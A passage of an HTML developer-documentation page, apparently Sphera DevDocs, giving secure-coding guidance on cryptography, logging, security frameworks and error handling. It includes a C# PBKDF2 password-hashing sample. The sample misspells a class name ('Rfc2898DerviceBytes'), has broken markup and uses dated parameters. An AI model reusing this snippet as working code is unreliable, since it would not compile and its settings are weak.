                                         <li>Don’t neglect the more difficult aspects of applied crypto, such as key management, overall cryptographic architecture design, tiering, and trust issues in complex software. Existing crypto hardware, such as a Hardware Security Module (HSM), can make your job easier. </li>
                                         <li>Avoid using an inadequate key, or storing the key along with the encrypted data.</li>
                                         <li>Don’t make confidential or sensitive data accessible in memory, or allow it to be written into temporary storage locations or log files that an attacker can view.</li>
                                         <li>Use transport layer security (TLS) to encrypt data in transit. </li>
                                      </ul>
                                      <hr/>
                                      <h3>EXAMPLES - Cryptographically secure password hashing</h3>
                                      <p>This is an example of cryptographically secure password hashing in C#.Net.</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 20px; line-height: 125%;">                  
<span style="color: #228b22;">// generate the SALT</span>
<span style="color: #a7a7a7; font-weight: bold;">byte</span>[] salt;
<span style="color: #8b008b; font-weight: bold;">new</span> <span style="color: #008b45;">RNGCryptoServiceProvider</span>().GetBytes(salt = <span style="color: #8b008b; font-weight: bold;">new</span> <span style="color: #a7a7a7; font-weight: bold;">byte</span>[<span style="color: #b452cd;">16</span>]);
                          
<span style="color: #228b22;">// hash and salt it using PBKDF2 - a slow algorithm</span>
<span style="color: #a7a7a7; font-weight: bold;">var</span> pbkdf2 = <span style="color: #8b008b; font-weight: bold;">new</span> Rfc2898DerviceBytes(password, salt, <span style="color: #b452cd;">10000</span>);
                          
<span style="color: #228b22;">// place the string in the byte array</span>
<span style="color: #a7a7a7; font-weight: bold;">byte</span>[] hash = pbkdf2.GetBytes(<span style="color: #b452cd;">20</span>);
                          
<span style="color: #228b22;">// make a new byte array to store the hashed password + salt</span>
<span style="color: #a7a7a7; font-weight: bold;">byte</span>[] hashBytes = <span style="color: #8b008b; font-weight: bold;">new</span> <span style="color: #a7a7a7; font-weight: bold;">byte</span>[<span style="color: #b452cd;">36</span>];
                          
<span style="color: #228b22;">// place the hash and salt in their respective places</span>
Array.Copy(salt, <span style="color: #b452cd;">0</span>, hashBytes, <span style="color: #b452cd;">0</span>, <span style="color: #b452cd;">16</span>);
Array.Copy(hash, <span style="color: #b452cd;">0</span>, hashBytes, span style="color: #b452cd;">16</span>, <span style="color: #b452cd;">20</span>);
                          
<span style="color: #228b22;">// now convert into a string for eventual storage</span>
<span style="color: #a7a7a7; font-weight: bold;">string</span> savedPasswordHash = Convert.ToBase64String(hashBytes);
                          </pre>
                                      </div>
                                      <br/>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" target="_blank">OWASP Password Storage Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" target="_blank">OWASP Cryptographic Storage Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.veracode.com/blog/research/cryptographically-secure-pseudo-random-number-generator-csprng" target="_blank">Cryptographically Secure Pseudo-Random Number Generators</a></li>
                                         <li> 
                                            <a href="https://www.veracode.com/blog/research/encryption-and-decryption-java-cryptography" target="_blank">Encryption and Decryption in Java Cryptography</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">8</div>
                                      <h2>Implement Logging and Intrustion Detection</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>Logging should be used for more than just debugging and troubleshooting.  Logging and tracking security events and metrics helps to enable what’s known as attack-driven defense, which considers the scenarios for real-world attacks against your system. For example, if a server-side validation catches a change to a non-editable, throw an alert or take some other action to protect your system. Focus on four key areas: application monitoring; business analytics and insight; activity auditing and compliance monitoring; and system intrusion detection and forensics. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Use an extensible logging framework like Serilog, or Apache Log4j2 / Log4net, to ensure that all log entries are consistent.</li>
                                         <li>Keep various audit and transaction logs separate for both security and auditing purposes.</li>
                                         <li>Always log the timestamp and identifying information, like source IP and user ID.</li>
                                         <li>Log all instances where inappropriate inputs are provided.</li>
                                         <li>Don’t log opt-out data, session IDs, or hash value of passwords, or sensitive or private data including credit card or Social Security numbers. </li>
                                         <li>Perform encoding on untrusted data before logging it to protect from log injection, also referred to as log forging.</li>
                                         <li>Log at an optimal level. Too much or too little logging heightens risk.</li>
                                      </ul>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Logging_Cheat_Sheet" target="_blank">OWASP Logging Cheat Sheet</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">9</div>
                                      <h2>Leverage Security Frameworks and Libraries</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>You can waste a lot of time — and unintentionally create security flaws — by developing security controls from scratch for every web application you’re working on. To avoid that, take advantage of established security frameworks and, when necessary, respected third-party libraries that provide tested and proven security controls. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Use existing secure framework features rather than using new tools, such as third-party libraries.</li>
                                         <li>Because some frameworks have security flaws, build in additional controls or security protections as needed.</li>
                                         <li>Use web application security frameworks, including Spring Security, Apache Shiro, Django Security, and Flask security.</li>
                                         <li>Regularly check for security flaws, and keep frameworks and libraries up to date. By understanding not just the status of the component but whether or not a vulnerable method is being called, organizations can pinpoint their component risk and prioritize fixes based on the riskiest uses of components. </li>
                                      </ul>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://info.veracode.com/webinars-not-a-free-lunch-a-best-practice-guide-on-how-to-get-a-handle-on-your-open-source-risk.html" target="_blank">A Best Practice Guide to Managing Your Open Source Risk</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">10</div>
                                      <h2>Monitor Error and Exception Handling</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>Error and exception handling isn’t exciting, but like input validation, it is a crucial element of defensive coding. Mistakes in error and exception handling can cause leakage of information to attackers, who can use it to better understand your platform or design. Even small mistakes in error handling have been found to cause catastrophic failures in distributed systems. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Conduct careful code reviews and use negative testing, including exploratory testing and pen testing, fuzzing, and fault injection, to identify problems in error handling.</li>
                                         <li>Manage exceptions in a centralized manner to avoid duplicated try/catch blocks in the code. In addition, verify that all unexpected behaviors are correctly handled inside the application.</li>
                                         <li>Confirm that error messages sent to users aren&#39;t susceptible to critical data leaks, and that exceptions are logged in a way that delivers enough information for QA, forensics, or incident response teams to understand the problem.</li>
                                         <li>Always turn custom Errors mode on for Web Applications to prevent showing the &quot;yellow screen of death&quot; and thus unintentionally providing information leakage about the application.</li>
                                      </ul>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Error_Handling" target="_blank">OWASP Code Review Guide: Error Handling</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="col-1"> 
                                   <br/>&#160;</div>&#160;</div>
                             <div class="row">
                                <div class="txt-article">
                                   <h2>Additional Resources</h2>
                                   <p>There are countless articles from both vendors and thought leaders on what are logging best practices and which framework you should be using.  I prefer to keep it simple and focus only on things that are universal.  The answer as to which framework to use and what your exact standards should be are really a matter for your team to decide.  After all, they understand their needs better​ than anyone else.  Just make sure that it is uniformly applied. </p>
                                   <ul style="list-style: none;">
                                      <li> 
                                         <a href="https://www.amazon.com/Tangled-Web-Securing-Modern-Applications/dp/1593273886" target="_blank">The Tangled Web: A Guide to Securing Modern Web Applications</a></li>
                                      <li> 
                                         <a href="https://www.amazon.com/Secure-Java-Web-Application-Development/dp/1439823510" target="_blank">Secure Java: For Web Application Development</a></li>
                                      <li> 
                                         <a href="https://www.veracode.com/resources/video/understanding-applications-security-ecosystem" target="_blank">Understanding Applications in the Security Ecosystem</a></li>
                                      <li> 
                                         <a href="https://www.veracode.com/resources/video/branded-vulnerabilities" target="_blank">Branded Vulnerabilities: How to Respond to Real Risk, Not Media Hype</a></li>
                                   </ul>
                                </div>
                             </div>
                        </article>
                      </div>
        </div>
      </section><!-- #about -->
    </main>
  
    <!--==========================
      Footer
    ============================-->
    <div id="footer">
            <div class="footer-top">
              <div class="container">
                <div class="row">
        
                  <div class="col-lg-3 col-md-6 footer-info">
                    <h3>Sphera DevDocs</h3>
                    <p>Cras fermentum odio eu feugiat lide par naso tierra. Justo eget nada terra videa magna derita valies darta donna mare fermentum iaculis eu non diam phasellus. Scelerisque felis imperdiet proin fermentum leo. Amet volutpat consequat mauris nunc congue.</p>
                  </div>
        
                  <div class="col-lg-3 col-md-6 footer-links">
                    <h4>Useful Links</h4>
                    <ul>
                      <li><i class="ion-ios-arrow-right"></i> <a href="https://platform-api-dev.portal.azure-api.net/">Home</a></li>
                      <li><i class="ion-ios-arrow-right"></i> <a href="https://sphera.com/about-us/">About us</a></li>
                      <li><i class="ion-ios-arrow-right"></i> <a href="https://platform-api-dev.portal.azure-api.net/">Developer Portal</a></li>
                      <li><i class="ion-ios-arrow-right"></i> <a href="#">Terms of service</a></li>
                      <li><i class="ion-ios-arrow-right"></i> <a href="#">Privacy policy</a></li>
                    </ul>
                  </div>
        
                  <div class="col-lg-3 col-md-6 footer-contact">
                    <h4>Contact Us</h4>
                    <p>
                      130 E Randolph St <br>
                      Suite 2900 <br>
                      Chiago, IL 60601<br>
                      United States <br>
                      <strong>Email:</strong> <a href="mailto:info@sphera.com?Subject=Developer%20Docs" target="_top">info@sphera.com</a><br>
                    </p>
        
                    <div class="social-links">
                      <a href="https://twitter.com/spherasolutions?lang=en" class="twitter"><i class="fa fa-twitter"></i></a>
                      <a href="https://www.facebook.com/SpheraSolutions/" class="facebook"><i class="fa fa-facebook"></i></a>
                      <a href="https://www.linkedin.com/company/sphera" class="linkedin"><i class="fa fa-linkedin"></i></a>
                    </div>
        
                  </div>
        
                  <div class="col-lg-3 col-md-6 footer-newsletter">
                    <h4>Our Newsletter</h4>
                    <p>Insights on Environmental Health &amp; Safety (EHS), Operational Risk and Product Stewardship Blog</p>
                    <a href="https://sphera.com/blog/">Visit the Sphera Blog</a>
                    <br><br>
                    <a href="https://sphera.com/spark/">Read the latest Spark Magazine</a>
                  </div>
        
                </div>
              </div>
            </div>
            <a href="#" class="back-to-top" style="display: inline;"><i class="fa fa-chevron-up"></i></a>
            </div><!-- #footer -->
  
    <a href="#" class="back-to-top" style="display: inline;"><i class="fa fa-chevron-up"></i></a>
    <!-- Uncomment below i you want to use a preloader -->
    <!-- <div id="preloader"></div> -->
  
    <!-- JavaScript Libraries -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.1.0/jquery-migrate.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.hoverintent/1.10.0/jquery.hoverIntent.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/superfish/1.7.10/js/superfish.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/waypoints/4.0.1/jquery.waypoints.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/Counter-Up/1.0.0/jquery.counterup.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/owl-carousel/1.3.3/owl.carousel.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.isotope/3.0.6/isotope.pkgd.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/lightbox2/2.11.1/js/lightbox.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.touchswipe/1.6.19/jquery.touchSwipe.min.js"></script>
  
    <!-- Template Main Javascript File -->
    <script src="/js/main-nocarousel.js"></script>
    <div id="mobile-body-overly"></div>
    <div id="lightboxOverlay" tabindex="-1" class="lightboxOverlay" style="display: none;"></div>
    <div id="lightbox" tabindex="-1" class="lightbox" style="display: none;">
      <div class="lb-outerContainer">
        <div class="lb-container">
          <img class="lb-image" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt=""><div class="lb-nav">
            <a class="lb-prev" aria-label="Previous image" href=""></a>
            <a class="lb-next" aria-label="Next image" href=""></a>
          </div>
          <div class="lb-loader">
            <a class="lb-cancel"></a>
          </div>
        </div>
      </div>
      <div class="lb-dataContainer">
        <div class="lb-data">
          <div class="lb-details">
            <span class="lb-caption"></span>
            <span class="lb-number"></span>
          </div>
          <div class="lb-closeContainer">
            <a class="lb-close"></a>
          </div>
        </div>
      </div>
    </div>
</body>
</html>
